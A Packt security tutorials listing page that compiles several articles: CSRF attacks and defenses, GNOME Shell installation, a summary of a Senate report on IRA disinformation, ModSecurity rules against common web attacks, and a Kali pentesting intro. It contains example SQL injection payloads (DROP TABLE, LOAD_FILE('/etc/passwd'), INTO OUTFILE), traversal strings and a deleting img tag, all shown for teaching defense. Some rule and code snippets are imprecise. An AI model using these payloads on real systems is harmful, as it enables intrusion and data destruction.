
How-To Tutorials - Security

174 Articles

Cross-site Request Forgery

Packt
17 Nov 2014
9 min read
In this article by Y.E. Liang, the author of JavaScript Security, we will cover cross-site request forgery. This topic is not exactly new. In this article, we will go deeper into cross-site request forgery and learn various techniques of defending against it. (For more resources related to this topic, see here.)

Introducing cross-site request forgery

Cross-site request forgery (CSRF) exploits the trust that a site has in a user's browser. It is also defined as an attack that forces an end user to execute unwanted actions on a web application in which the user is currently authenticated.

Examples of CSRF

We will now take a look at a basic CSRF example:

Go to the source code and change the directory. Run the following command:

python xss_version.py

Remember to start your MongoDB process as well.

Next, open external.html, found in templates, on another host, say http://localhost:8888. You can do this by starting the server with python xss_version.py --port=8888 and then visiting http://localhost:8888/todo_external. You will see the following screenshot:

Adding a new to-do item

Click on Add To Do and fill in a new to-do item, as shown in the following screenshot:

Adding a new to-do item and posting it

Next, click on Submit. Going back to your to-do list app at http://localhost:8000/todo and refreshing it, you will see the new to-do item added to the database, as shown in the following screenshot:

To-do item is added from an external app; this is dangerous!

To attack the to-do list app, all we need to do is add a new item that contains a line of JavaScript, as shown in the following screenshot:

Adding a new to-do item for the Python version

Now, click on Submit. Then, go back to your to-do app at http://localhost:8000/todo, and you will see two subsequent alerts, as shown in the following screenshot:

Successfully injected JavaScript part 1

So here's the first instance where CSRF happens:

Successfully injected JavaScript part 2

Take note that this can happen to backends written in other languages as well. Now go to your terminal, turn off the Python server backend, and change the directory to node/. Start the Node server by issuing this command:

node server.js

This time around, the server is running at http://localhost:8080, so remember to change the $.post() endpoint to http://localhost:8080 instead of http://localhost:8000 in external.html, as shown in the following code:

function addTodo() {
  var data = {
    text: $('#todo_title').val(),
    details: $('#todo_text').val()
  }
  // $.post('http://localhost:8000/api/todos', data, function(result) {
  $.post('http://localhost:8080/api/todos', data, function(result) {
    var item = todoTemplate(result.text, result.details);
    $('#todos').prepend(item);
    $("#todo-form").slideUp();
  })
}

The line changed is found in addTodo(); the highlighted code is the correct endpoint for this section. Now, going back to external.html, add a new to-do item containing JavaScript, as shown in the following screenshot:

Trying to inject JavaScript into a to-do app based on Node.js

As usual, submit the item. Go to http://localhost:8080/api/ and refresh; you should see two alerts (or four alerts if you didn't delete the previous ones). The first alert is as follows:

Successfully injected JavaScript part 1

The second alert is as follows:

Successfully injected JavaScript part 2

Now that we have seen what can happen to our app if we suffered a CSRF attack, let's think about how such attacks can happen.
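To make the root cause concrete before answering that, here is a minimal sketch of the kind of unprotected endpoint the external page is posting to. This is not the book's server.js; it is a hypothetical Express-style handler (the route and field names are assumptions) that accepts any POST and stores it, which is exactly what lets the cross-site post succeed.

// Hypothetical sketch of an unprotected endpoint (not the book's server.js).
// It trusts every POST it receives: no CSRF token, no origin check.
var express = require('express');
var bodyParser = require('body-parser');

var app = express();
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));

var todos = []; // stand-in for the MongoDB collection used in the article

app.post('/api/todos', function (req, res) {
  // Whatever the browser sends is stored verbatim, including a payload
  // submitted by a page on a completely different origin.
  var todo = { text: req.body.text, details: req.body.details };
  todos.push(todo);
  res.json(todo);
});

app.listen(8000);

Because nothing ties the request to a token or checks where it came from, the server cannot tell a forged request from a legitimate one, and the browser helpfully attaches the user's cookies to both.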
Basically, such attacks can happen when our API endpoints (or the URLs accepting the requests) are not protected at all. Attackers can exploit such vulnerabilities by simply observing which endpoints are used and attempting to exploit them by performing a basic HTTP POST operation against them.

Basic defense against CSRF attacks

If you are using modern frameworks or packages, the good news is that you can easily protect against such attacks by turning on or making use of CSRF protection. For example, for server.py, you can turn on xsrf_cookies by setting it to True, as shown in the following code:

class Application(tornado.web.Application):
    def __init__(self):
        handlers = [
            (r"/api/todos", Todos),
            (r"/todo", TodoApp)
        ]
        conn = pymongo.Connection("localhost")
        self.db = conn["todos"]
        settings = dict(
            xsrf_cookies=True,
            debug=True,
            template_path=os.path.join(os.path.dirname(__file__), "templates"),
            static_path=os.path.join(os.path.dirname(__file__), "static")
        )
        tornado.web.Application.__init__(self, handlers, **settings)

Note the highlighted line, where we set xsrf_cookies=True. For the Node.js backend, have a look at the following code snippet:

var express    = require('express');
var bodyParser = require('body-parser');
var app        = express();
var session    = require('cookie-session');
var csrf       = require('csrf');

app.use(csrf());
app.use(bodyParser());

The highlighted lines are the new lines (compared to server.js) that add CSRF protection. Now that both backends are equipped with CSRF protection, you can try to make the same post from external.html. You will not be able to make any post from external.html. For example, you can open Chrome's developer tools and go to Network. You will see the following:

POST forbidden

On the terminal, you will see a 403 error from our Python server, which is shown in the following screenshot:

POST forbidden from the server side

Other examples of CSRF

CSRF can also happen in many other ways. In this section, we'll cover other basic examples of how CSRF can happen.

CSRF using the <img> tags

This is a classic example. Consider the following instance:

<img src=http://yoursite.com/delete?id=2 />

Should you load a site that contains this img tag, chances are that a piece of data may get deleted unknowingly.

Now that we have covered the basics of preventing CSRF attacks through the use of CSRF tokens, the next question you may have is: what if there are times when you need to expose an API to an external app? For example, Facebook's Graph API, Twitter's API, and so on allow external apps not only to read, but also write data to their systems. How do we prevent malicious attacks in this situation? We'll cover this and more in the next section.

Other forms of protection

Using CSRF tokens may be a convenient way to protect your app from CSRF attacks, but it can be a hassle at times. As mentioned in the previous section, what about the times when you need to expose an API to allow mobile access? Or, your app is growing so quickly that you want to accelerate that growth by creating a Graph API of your own. How do you manage it then? In this section, we will quickly go over the techniques for protection.
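Before moving on to those techniques, it helps to see roughly what the framework-level protection above is doing on our behalf. The following is a minimal, hand-rolled sketch of the synchronizer-token idea, written against a hypothetical Express app; the route names, the cookie-session usage, and the hidden-field name are assumptions, not the book's code.

var express = require('express');
var bodyParser = require('body-parser');
var session = require('cookie-session');
var crypto = require('crypto');

var app = express();
app.use(bodyParser.urlencoded({ extended: false }));
app.use(session({ name: 'sess', keys: ['change-this-secret'] }));

// Issue a per-session token and embed it in the form we render.
app.get('/todo/new', function (req, res) {
  if (!req.session.csrfToken) {
    req.session.csrfToken = crypto.randomBytes(16).toString('hex');
  }
  res.send(
    '<form method="POST" action="/api/todos">' +
    '<input type="hidden" name="_csrf" value="' + req.session.csrfToken + '">' +
    '<input name="text"><button>Add</button></form>'
  );
});

// Reject any POST whose token does not match the one stored in the session.
app.post('/api/todos', function (req, res) {
  if (!req.session.csrfToken || req.body._csrf !== req.session.csrfToken) {
    return res.status(403).send('CSRF token missing or invalid');
  }
  res.json({ text: req.body.text }); // persist the item here in a real app
});

app.listen(8000);

An external page cannot read the token out of our form (the same-origin policy prevents it), so a forged POST arrives without a valid _csrf value and is rejected; this is essentially what xsrf_cookies=True and the csrf middleware arrange for us.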
Creating your own app ID and app secret – OAuth-styled

Creating your own app ID and app secret is similar to what the major Internet companies are doing right now: we require developers to sign up for developer accounts and attach an application ID and secret key to each of their apps. Using this information, the developers will need to exchange OAuth credentials in order to make any API calls, as shown in the following screenshot:

Google requires developers to sign up, and it assigns the client ID

On the server end, all you need to do is look for the application ID and secret key; if they are not present, simply reject the request. Have a look at the following screenshot:

The same thing with Facebook; Facebook requires you to sign up, and it assigns an app ID and app secret

Checking the Origin header

Simply put, you want to check where the request is coming from, and you can do this by checking the Origin header. The Origin header, in layman's terms, indicates which site the request originated from. There are at least two use cases for the Origin header, which are as follows:

Assuming your endpoint is used internally (by your own web application), you can check whether the requests are indeed made from the same website, that is, your website.

If you are creating an endpoint for external use, such as one similar to Facebook's Graph API, then you can make developers register the website URL where they are going to use the API. If the website URL does not match the one that was registered, you can reject the request.

Note that the Origin header can also be modified; for example, an attacker can provide a forged header.

Limiting the lifetime of the token

Assuming that you are generating your own tokens, you may also want to limit the lifetime of the token, for instance, making the token valid only for a certain time period while the user is logged in to your site. Similarly, your site can make this a requirement in order for requests to be made; if the token does not exist, HTTP requests cannot be made.

Summary

In this article, we covered the basic forms of CSRF attacks and how to defend against them. Note that these security loopholes can come from both the frontend and the server side.

Resources for Article:

Further resources on this subject:

Implementing Stacks using JavaScript [Article]

Cordova Plugins [Article]

JavaScript Promises – Why Should I Care? [Article]


Install GNOME-Shell on Ubuntu 9.10 "Karmic Koala"

Packt
18 Jan 2010
3 min read
Remember, these are development builds and preview snapshots, and they are still in the early stages. While GNOME Shell appears to be functional (so far), your mileage may vary.

Installing GNOME-Shell

With the release of Ubuntu 9.10, a GNOME-Shell preview is included in the repositories. This makes it very easy to install (and remove) as needed. The downside is that it is just a snapshot, so you are not running the latest and greatest builds. For this reason I've included instructions on installing the package as well as compiling the latest builds. I should also note that GNOME Shell requires reasonable 3D support. This means that it will likely *not* work within a virtual machine. In particular, problems have been reported trying to run GNOME Shell with 3D support in VirtualBox.

Package Installation

If you'd prefer to install the package and just take a sneak peek at the snapshot, simply run the command below in your terminal:

sudo aptitude install gnome-shell

Manual Compilation

Manually compiling GNOME Shell will allow you to use the latest and greatest builds, but it can also require more work. The notes below are based on a successful build I did in late 2009, but your mileage may vary. If you run into problems, please note that installing GNOME Shell does not affect your current installation, so if the build breaks you should still have a clean environment. You can find more details as well as known issues here: GnomeShell.

There is one package that you'll need to compile GNOME Shell, called jhbuild. This package, however, has been removed from the Ubuntu 9.10 repositories for being outdated. I did find that I could use the package from the 9.04 repository and haven't noticed any problems in doing so. To install jhbuild from the 9.04 repository, use the instructions below:

Visit http://packages.ubuntu.com/jaunty/all/jhbuild/download

Select a mirror close to you

Download / install the .deb package. I don't believe there are any additional dependencies needed for this package.

After that package is installed, you'll want to download a GNOME Shell build setup script, which makes this entire process much, much simpler:

cd ~
wget http://git.gnome.org/cgit/gnome-shell/plain/tools/build/gnome-shell-build-setup.sh

This script will handle finding and installing dependencies as well as compiling the builds. To launch this script, run the command:

gnome-shell-build-setup.sh

You'll need to ensure that any suggested packages are installed before continuing. You may need to re-run this script multiple times until it produces no more warnings. Lastly, you can begin the build process. This process took about twenty minutes on my C2D 2.0GHz Dell laptop. My build was completely automated, but considering this is building newer and newer builds, your mileage may vary. To begin the build process on your machine, run the command:

jhbuild build

Ready To Launch

Congratulations! You've now got GNOME-Shell installed and ready to launch. I've outlined the steps below; please take note of the method that matches how you installed. Also, please note that before you launch GNOME-Shell you must DISABLE Compiz. If you have Compiz running, navigate to System > Preferences > Appearances and disable it under the Desktop Effects tab.

Package Installation

Launch it as follows:

gnome-shell --replace

Manual Compilation

Launch it as follows:

~/gnome-shell/source/gnome-shell/src/gnome-shell --replace


How IRA hacked American democracy using social media and meme warfare to promote disinformation and polarization: A new report to Senate Intelligence Committee

Natasha Mathur
18 Dec 2018
9 min read
A new report prepared for the Senate Intelligence Committee by the cybersecurity firm New Knowledge was released yesterday. The report, titled "The Tactics & Tropes of the Internet Research Agency", provides an insight into how the IRA, a group of Russian agents, used and continues to use social media to influence politics in America by exploiting the political and racial divisions in American society.

"Throughout its multi-year effort, the Internet Research Agency exploited divisions in our society by leveraging vulnerabilities in our information ecosystem. We hope that our work has resulted in a clearer picture for policymakers, platforms, and the public alike and thank the Senate Select Committee on Intelligence for the opportunity to serve", says the report.

Russian interference during the 2016 presidential elections comprised Russian agents trying to hack the online voting systems, cyber-attacks aimed at the Democratic National Committee, and social media influence tactics designed to exacerbate the political and social divisions in the US. As a part of the SSCI's investigation into the IRA's social media activities, some of the social platform companies that were misused by the IRA, such as Twitter, Facebook, and Alphabet, provided data related to IRA influence tactics. However, none of these platforms provided complete sets of related data to the SSCI. "Some of what was turned over was in PDF form; other datasets contained extensive duplicates. Each lacked core components that would have provided a fuller and more actionable picture. The data set provided to the SSCI for this analysis includes data previously unknown to the public ... and ... is the first comprehensive analysis by entities other than the social platforms", reads the report.

The report brings to light the IRA's strategy, which involved deciding on certain themes, primarily social issues, and then reinforcing these themes across its Facebook, Instagram, and YouTube content. Different topics such as black culture, anti-Clinton, pro-Trump, anti-refugee, Muslim culture, LGBT culture, Christian culture, feminism, veterans, ISIS, and so on were grouped thematically on Facebook Pages and Instagram accounts to reinforce the culture and foster feelings of pride. Here is a look at some key highlights from the report.

Key Takeaways

IRA used Instagram as its biggest tool for influence

As per the report, Facebook executives, during the Congressional testimony held in April this year, hid the fact that Instagram played a major role in the IRA's influence operation. There were about 187 million engagements on Instagram compared to 76.5 million on Facebook and 73 million on Twitter, according to a data set of posts between 2015 and 2018. In 2017, the IRA moved much of its activity and influence operations to Instagram as the media started looking into its Facebook and Twitter operations. Instagram was the most effective platform for the Internet Research Agency: approximately 40% of its Instagram accounts achieved over 10,000 followers (a level referred to as "micro-influencers" by marketers) and twelve of these accounts had over 100,000 followers (the "influencer" level).

The Tactics & Tropes of IRA

"Instagram engagement outperformed Facebook, which may indicate its strength as a tool in image-centric memetic (meme) warfare. Our assessment is that Instagram is likely to be a key battleground on an ongoing basis," reads the report. Apart from social media posts, another feature of the IRA's Instagram activity was merchandise.
This merchandise promotion was aimed at building partnerships to boost audience growth and gather audience data. This was especially evident in the Black-targeted communities, with hashtags #supportblackbusiness and #buyblack appearing quite frequently. In fact, sometimes these IRA pages also offered coupons in exchange for sharing content.

The Tactics & Tropes of IRA

IRA promoted Voter Suppression Operations

The report states that although Twitter and Facebook were debating whether any voter suppression content was present on these platforms, three major variants of voter suppression narratives were found to be widespread on Twitter, Facebook, Instagram, and YouTube. These included malicious misdirection (for example, tweets promoting false voting rules), candidate support redirection, and turnout depression (for example, "no need to vote, your vote doesn't matter").

The Tactics & Tropes of IRA

For instance, a few days before the 2016 presidential elections in the US, the IRA started to implement voter suppression tactics on its Black-community-targeted accounts. The IRA started to spread content about voter fraud and deliver warnings that the "election would be stolen and violence might be necessary". These suppression narratives and this content were targeted almost exclusively at the Black community on Instagram and Facebook. There was also the promotion of other kinds of content on topics such as alienation and violence to divert people's attention away from politics. Other varieties of voter suppression narratives included: "don't vote, stay home", "this country is not for Black people", "these candidates don't care about Black people", and so on. Voter-suppression narratives aimed at non-Black communities focused primarily on promoting identity and pride for communities like Native Americans, LGBT+ people, and Muslims.

The Tactics & Tropes of IRA

Then there were narratives that directly and broadly called for voting for candidates other than Hillary Clinton, and pages on Facebook that posted repeatedly about voter fraud, stolen elections, conspiracies about voting machines provided by Soros, and rigged votes.

IRA largely targeted Black American communities

The IRA's major efforts on Facebook and Instagram were targeted at Black communities in America and involved developing and recruiting Black Americans as assets. The report states that the IRA adopted a cross-platform "media mirage" strategy which shared authentic Black-related content to create a strong influence on the Black community over social media. An example presented in the report is a case study of "Black Matters", which illustrates the extent to which the IRA created an "inauthentic media property" by creating different accounts across the social platforms to "reinforce its brand" and widely distribute its content. "Using only the data from the Facebook Page posts and memes, we generated a map of the cross-linked properties – other accounts that the Pages shared from, or linked to – to highlight the complex web of IRA-run accounts designed to surround Black audiences," reads the report. So, an individual who followed or liked one of the Black-community-targeted IRA Pages would be exposed to content from a dozen more pages.

Apart from the IRA's media mirage strategy, there was also a human asset recruitment strategy. It involved posts encouraging Americans to perform different types of tasks for IRA handlers.
Some of these tasks included requests for contact with preachers from Black churches, soliciting volunteers to hand out fliers, offering free self-defense classes (Black Fist/Fit Black), requests for speakers at protests, and so on. These posts appeared in the Black-, Left-, and Right-targeted groups, although they were mostly present in the Black groups and communities. "The IRA exploited the trust of their Page audiences to develop human assets, at least some of whom were not aware of the role they played. This tactic was substantially more pronounced on Black-targeted accounts", reads the report. The IRA also created domain names such as blackvswhite.info, blackmattersusa.com, blacktivist.info, blacktolive.org, and so on. It also created YouTube channels like "Cop Block US" and "Don't Shoot" to spread anti-Clinton videos.

In response to these reports of specific Black targeting on Facebook, the National Association for the Advancement of Colored People (NAACP) returned a donation from Facebook and called on its users yesterday to log out of all Facebook-owned products, such as Facebook, Instagram, and WhatsApp, today. "NAACP remains concerned about the data breaches and numerous privacy mishaps that the tech giant has encountered in recent years, and is especially critical about those which occurred during the last presidential election campaign", reads the NAACP announcement.

IRA promoted Pro-Trump and anti-Clinton operations

As per the report, the IRA focused on promoting political content expressing pro-Donald Trump sentiments over different channels and pages, regardless of whether these pages targeted conservatives, liberals, or racial and ethnic groups.

The Tactics & Tropes of IRA

On the other hand, large volumes of political content articulated anti-Hillary Clinton sentiments among both the Right- and Left-leaning communities created by the IRA. Moreover, there weren't any IRA communities or pages on Instagram and Facebook that favored Clinton. There were some pro-Clinton Twitter posts, but most of the tweets were still largely anti-Clinton.

The Tactics & Tropes of IRA

Additionally, there were different YouTube channels created by the IRA, such as Williams & Kalvin, Cop Block US, Don't Shoot, and so on, and 25 videos across these channels contained election-related keywords in their titles; all of these videos were anti-Hillary Clinton. One example presented in the report is of one of the political channels, Paul Jefferson, which solicited videos for a #PeeOnHillary video challenge (the hashtag also appeared on Twitter and Instagram) and shared the submissions it received. Other videos promoted by these YouTube channels were "The truth about elections", "HILLARY RECEIVED $20,000 DONATION FROM KKK TOWARDS HER CAMPAIGN", and so on. Also, on the IRA's Facebook account, the post with the maximum shares and engagement was a conspiracy theory about President Barack Obama refusing to ban Sharia Law and encouraging Trump to take action.

The Tactics & Tropes of IRA

Also, the number one post on Facebook featuring Hillary Clinton was a conspiratorial post that was made public a month before the election.

The Tactics & Tropes of IRA

These were some of the major highlights from the report. However, the report states that there is still a lot to be done with regard to the IRA specifically. There is a need for further investigation of subscription and engagement pathways, and only the social media platforms currently have that data.
The New Knowledge team hopes that these platforms will provide more data that can speak to the impact among the targeted communities. For more information on the tactics of the IRA, read the full report here.

Facebook, Twitter takes down hundreds of fake accounts with ties to Russia and Iran, suspected to influence the US midterm elections

Facebook plans to change its algorithm to demote "borderline content" that promotes misinformation and hate speech on the platform

Facebook's outgoing Head of communications and policy takes the blame for hiring PR firm 'Definers' and reveals more


Blocking Common Attacks using ModSecurity 2.5: Part 3

Packt
01 Dec 2009
12 min read
Source code revelation

Normally, requesting a file with a .php extension will cause mod_php to execute the PHP code contained within the file and then return the resulting web page to the user. If the web server is misconfigured (for example, if mod_php is not loaded) then the .php file will be sent by the server without interpretation, and this can be a security problem. If the source code contains credentials used to connect to an SQL database, then that opens up an avenue for attack, and of course the source code being available will allow a potential attacker to scrutinize the code for vulnerabilities.

Preventing source code revelation is easy. With response body access on in ModSecurity, simply add a rule to detect the opening PHP tag:

# Prevent PHP source code from being disclosed
SecRule RESPONSE_BODY "<?" "deny,msg:'PHP source code disclosure blocked'"

Preventing Perl and JSP source code from being disclosed works in a similar manner:

# Prevent Perl source code from being disclosed
SecRule RESPONSE_BODY "#!/usr/bin/perl" "deny,msg:'Perl source code disclosure blocked'"

# Prevent JSP source code from being disclosed
SecRule RESPONSE_BODY "<%" "deny,msg:'JSP source code disclosure blocked'"

Directory traversal attacks

Normally, all web servers should be configured to reject attempts to access any document that is not under the web server's root directory. For example, if your web server root is /home/www, then attempting to retrieve /home/joan/.bashrc should not be possible, since this file is not located under the /home/www web server root. The obvious attempt to access the /home/joan directory is, of course, easy for the web server to block; however, there is a more subtle way to access this directory which still allows the path to start with /home/www, and that is to make use of the .. symbolic directory link, which links to the parent directory in any given directory.

Even though most web servers are hardened against this sort of attack, web applications that accept input from users may still not be checking it properly, potentially allowing users to get access to files they shouldn't be able to view via simple directory traversal attacks. This alone is reason to implement protection against this sort of attack using ModSecurity rules. Furthermore, keeping with the principle of Defense in Depth, having multiple protections against this vulnerability can be beneficial in case the web server should contain a flaw that allows this kind of attack in certain circumstances.

There is more than one way to validly represent the .. link to the parent directory. URL encoding of .. yields %2e%2e, and adding the final slash at the end, we end up with %2e%2e%2f. Here, then, is a list of what needs to be blocked:

../
..%2f
.%2e/
%2e%2e%2f
%2e%2e/
%2e./

Fortunately, we can use the ModSecurity transformation t:urlDecode. This function does all the URL decoding for us and allows us to ignore the percent-encoded variants, so only one rule is needed to block these attacks:

SecRule REQUEST_URI "../" "t:urlDecode,deny"

Blog spam

The rise of weblogs, or blogs, as a new way to present information, share thoughts, and keep an online journal has made way for a new phenomenon: blog comments designed to advertise a product or drive traffic to a website.
Blog spam isn't a security problem per se, but it can be annoying and cost a lot of time when you have to manually remove spam comments (or delete them from the approval queue, if comments have to be approved before being posted on the blog). Blog spam can be mitigated by collecting a list of the most common spam phrases and using the ability of ModSecurity to scan POST data. Any attempted blog comment that contains one of the offending phrases can then be blocked.

From both a performance and maintainability perspective, using the @pmFromFile operator is the best choice when dealing with large word lists such as spam phrases. To create the list of phrases to be blocked, simply insert them into a text file, for example, /usr/local/spamlist.txt:

viagra
v1agra
auto insurance
rx medications
cheap medications
...

Then create ModSecurity rules to block those phrases when they are used in locations such as the page that creates new blog comments:

#
# Prevent blog spam by checking comment against known spam
# phrases in file /usr/local/spamlist.txt
#
<Location /blog/comment.php>
  SecRule ARGS "@pmFromFile /usr/local/spamlist.txt" "t:lowercase,deny,msg:'Blog spam blocked'"
</Location>

Keep in mind that the spam list file can contain whole sentences—not just single words—so be sure to take advantage of that fact when creating the list of known spam phrases.

SQL injection

SQL injection attacks can occur if an attacker is able to supply data to a web application that is then used in unsanitized form in an SQL query. This can cause the SQL query to do completely different things than intended by the developers of the web application. Consider an SQL query like this:

SELECT * FROM user WHERE username = '%s' AND password = '%s';

The flaw here is that if someone can provide a password that looks like ' OR '1'='1, then the query, with username and password inserted, will become:

SELECT * FROM user WHERE username = 'anyuser' AND password = '' OR '1'='1';

This query will return all users in the results table, since the OR '1'='1' part at the end of the statement will make the entire statement true no matter what username and password is provided.

Standard injection attempts

Let's take a look at some of the most common ways SQL injection attacks are performed.

Retrieving data from multiple tables with UNION

An SQL UNION statement can be used to retrieve data from two separate tables. If there is one table named cooking_recipes and another table named user_credentials, then the following SQL statement will retrieve data from both tables:

SELECT dish_name FROM cooking_recipes UNION SELECT username, password FROM user_credentials;

It's easy to see how the UNION statement can allow an attacker to retrieve data from other tables in the database if he manages to sneak it into a query. A similar SQL statement is UNION ALL, which works almost the same way as UNION—the only difference is that UNION ALL will not eliminate any duplicate rows returned in the result.

Multiple queries in one call

If the SQL engine allows multiple statements in a single SQL query, then seemingly harmless statements such as the following can present a problem:

SELECT * FROM products WHERE id = %d;

If an attacker is able to provide an ID parameter of 1; DROP TABLE products;, then the statement suddenly becomes:

SELECT * FROM products WHERE id = 1; DROP TABLE products;

When the SQL engine executes this, it will first perform the expected SELECT query, and then the DROP TABLE products statement, which will cause the products table to be deleted.
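To connect these SQL fragments back to application code, here is a hedged sketch of how the vulnerability typically appears in a Node.js backend and how a parameterized query avoids it. The table, column, and credential names are hypothetical, and the mysql driver shown here simply stands in for whatever database client you actually use.

var mysql = require('mysql');
var connection = mysql.createConnection({
  host: 'localhost',
  user: 'shop',
  password: 'secret',
  database: 'shop'
});

// DANGEROUS: user input is concatenated straight into the SQL text.
// With id = "1; DROP TABLE products" the query can become two statements.
function getProductUnsafe(id, callback) {
  connection.query('SELECT * FROM products WHERE id = ' + id, callback);
}

// SAFER: the ? placeholder is filled in by the driver, so the input is
// always treated as data, never as SQL syntax.
function getProduct(id, callback) {
  connection.query('SELECT * FROM products WHERE id = ?', [id], callback);
}

This is the same principle as the prepared statements covered later in this article; the ModSecurity rules then act as an additional, independent layer of defense.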
Reading arbitrary files

MySQL can be used to read data from arbitrary files on the system. This is done by using the LOAD_FILE() function:

SELECT LOAD_FILE("/etc/passwd");

This command returns the contents of the file /etc/passwd. This works for any file to which the MySQL process has read access.

Writing data to files

MySQL also supports the command INTO OUTFILE, which can be used to write data into files. This attack illustrates how dangerous it can be to include user-supplied data in SQL commands, since with the proper syntax, an SQL command can not only affect the database, but also the underlying file system. This simple example shows how to use MySQL to write the string some data into the file test.txt:

mysql> SELECT "some data" INTO OUTFILE "test.txt";

Preventing SQL injection attacks

There are three important steps you need to take to prevent SQL injection attacks:

Use SQL prepared statements.

Sanitize user data.

Use ModSecurity to block SQL injection code supplied to web applications.

These are in order of importance, so the most important consideration should always be to make sure that any code querying SQL databases that relies on user input uses prepared statements. A prepared statement looks as follows:

SELECT * FROM books WHERE isbn = ? AND num_copies < ?;

This allows the SQL engine to replace the question marks with the actual data. Since the SQL engine knows exactly what is data and what is SQL syntax, this prevents SQL injection from taking place. The advantages of using prepared statements are twofold: they effectively prevent SQL injection, and they speed up execution time, since the SQL engine can compile the statement once and use the pre-compiled statement on all subsequent query invocations. So not only will using prepared statements make your code more secure—it will also make it quicker.

The second step is to make sure that any user data used in SQL queries is sanitized. Any unsafe characters, such as single quotes, should be escaped. If you are using PHP, the function mysql_real_escape_string() will do this for you.

Finally, let's take a look at strings that ModSecurity can help block to prevent SQL injection attacks.

What to block

The following table lists common SQL commands that you should consider blocking, together with a suggested regular expression for each. The regular expressions are in lowercase and therefore assume that the t:lowercase transformation function is used.

SQL code          Regular expression
UNION SELECT      union\s+select
UNION ALL SELECT  union\s+all\s+select
INTO OUTFILE      into\s+outfile
DROP TABLE        drop\s+table
ALTER TABLE       alter\s+table
LOAD_FILE         load_file
SELECT *          select\s+\*

For example, a rule to detect attempts to write data into files using INTO OUTFILE looks as follows:

SecRule ARGS "into\s+outfile" "t:lowercase,deny,msg:'SQL Injection'"

The \s+ regular expression syntax allows for detection of an arbitrary number of whitespace characters. This will detect evasion attempts such as INTO%20%20OUTFILE, where multiple spaces are used between the SQL command words.

Website defacement

We've all seen the news stories: "Large Company X was yesterday hacked and their homepage was replaced with an obscene message". This sort of thing is an everyday occurrence on the Internet. After the company SCO initiated a lawsuit against Linux vendors citing copyright violations in the Linux source code, the SCO corporate website was hacked and an image was altered to read WE OWN ALL YOUR CODE—pay us all your money.
The hack was subtle enough that the casual visitor to the SCO site would likely not be able to tell that this was not the official version of the homepage. The above image shows what the SCO homepage looked like after being defaced—quite subtle, don't you think?

Preventing website defacement is important for a business for several reasons:

Potential customers will turn away when they see the hacked site

There will be an obvious loss of revenue if the site is used for any sort of e-commerce sales

Bad publicity will tarnish the company's reputation

Defacement of a site will, of course, depend on a vulnerability being successfully exploited. The measures we will look at here are aimed at detecting that a defacement has taken place, so that the real site can be restored as quickly as possible. Detection of website defacement is usually done by looking for a specific token in the outgoing web pages. This token has been placed within the pages in advance specifically so that it may be used to detect defacement—if the token isn't there, then the site has likely been defaced. This can be sufficient, but it can also allow the attacker to insert the same token into his defaced page, defeating the detection mechanism. Therefore, we will go one better and create a defacement detection technique that will be difficult for the hacker to get around.

To create a dynamic token, we will be using the visitor's IP address. The reason we use the IP address instead of the hostname is that a reverse lookup may not always be possible, whereas the IP address will always be available. The following example code in JSP illustrates how the token is calculated and inserted into the page:

<%@ page import="java.security.*" %>
<%
String tokenPlaintext = request.getRemoteAddr();
String tokenHashed = "";
String hexByte = "";
// Hash the IP address
MessageDigest md5 = MessageDigest.getInstance("MD5");
md5.update(tokenPlaintext.getBytes());
byte[] digest = md5.digest();
for (int i = 0; i < digest.length; i++) {
  hexByte = Integer.toHexString(0xFF & digest[i]);
  if (hexByte.length() < 2) {
    hexByte = "0" + hexByte;
  }
  tokenHashed += hexByte;
}
// Write MD5 sum token to HTML document
out.println(String.format("<span style='color: white'>%s</span>", tokenHashed));
%>

Assuming the background of the page is white, the <span style='color: white'> markup will ensure the token is not visible to website viewers.

Now for the ModSecurity rules to handle the defacement detection. We need to look at outgoing pages and make sure that they include the appropriate token. Since the token will be different for different users, we need to calculate the same MD5 sum token in our ModSecurity rule and make sure that this token is included in the output. If not, we block the page from being sent and sound the alert by sending an email message to the website administrator.

#
# Detect and block outgoing pages not containing our token
#
SecRule REMOTE_ADDR ".*" "phase:4,deny,chain,t:md5,t:hexEncode,exec:/usr/bin/emailadmin.sh"
SecRule RESPONSE_BODY "!@contains %{MATCHED_VAR}"

We are placing the rule in phase 4, since this is required when we want to inspect the response body. The exec action is used to send an email to the website administrator to let him know of the website defacement.
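For a backend that is not JSP-based, the same per-visitor token can be produced with a few lines of JavaScript. The following is a minimal sketch, assuming an Express-style handler where the client address is available on the request; the function names are illustrative, not taken from the book.

var crypto = require('crypto');

// Hash the visitor's IP address, exactly as the JSP example does,
// so that the ModSecurity rule can recompute and verify the same value.
function defacementToken(remoteAddr) {
  return crypto.createHash('md5').update(remoteAddr).digest('hex');
}

// Embed the token invisibly in the page (white text on a white background).
function tokenMarkup(req) {
  return "<span style='color: white'>" + defacementToken(req.ip) + "</span>";
}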


Web app penetration testing in Kali

Packt
30 Oct 2013
4 min read
(For more resources related to this topic, see here.)

Web apps are now a major part of today's World Wide Web. Keeping them safe and secure is the prime focus of webmasters. Building web apps from scratch can be a tedious task, and there can be small bugs in the code that can lead to a security breach. This is where web app penetration testing jumps in and helps you secure your application. Web app penetration testing can be implemented on various fronts such as the frontend interface, database, and web server. Let us leverage the power of some of the important tools of Kali that can be helpful during web app penetration testing.

WebScarab proxy

WebScarab is an HTTP and HTTPS proxy interceptor framework that allows the user to review and modify the requests created by the browser before they are sent to the server. Similarly, the responses received from the server can be modified before they are reflected in the browser. The new version of WebScarab has many more advanced features, such as XSS/CSRF detection, session ID analysis, and fuzzing. Follow these three steps to get started with WebScarab:

To launch WebScarab, browse to Applications | Kali Linux | Web applications | Web application proxies | WebScarab.

Once the application is loaded, you will have to change your browser's network settings. Set the proxy settings for IP as 127.0.0.1 and Port as 8008.

Save the settings and go back to the WebScarab GUI. Click on the Proxy tab and check Intercept request. Make sure that both GET and POST requests are highlighted on the left-hand side panel. To intercept the response, check Intercept responses to begin reviewing the responses coming from the server.

Attacking the database using sqlninja

sqlninja is a popular tool used to test SQL injection vulnerabilities in Microsoft SQL servers. Databases are an integral part of web apps; hence, even a single flaw in them can lead to mass compromise of information. Let us see how sqlninja can be used for database penetration testing.

To launch sqlninja, browse to Applications | Kali Linux | Web applications | Database Exploitation | sqlninja. This will launch the terminal window with sqlninja parameters. The important parameter to look for is either the mode parameter or the -m parameter. The -m parameter specifies the type of operation we want to perform over the target database. Let us pass a basic command and analyze the output:

root@kali:~# sqlninja -m test

Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer
[-] sqlninja.conf does not exist. You want to create it now ? [y/n]

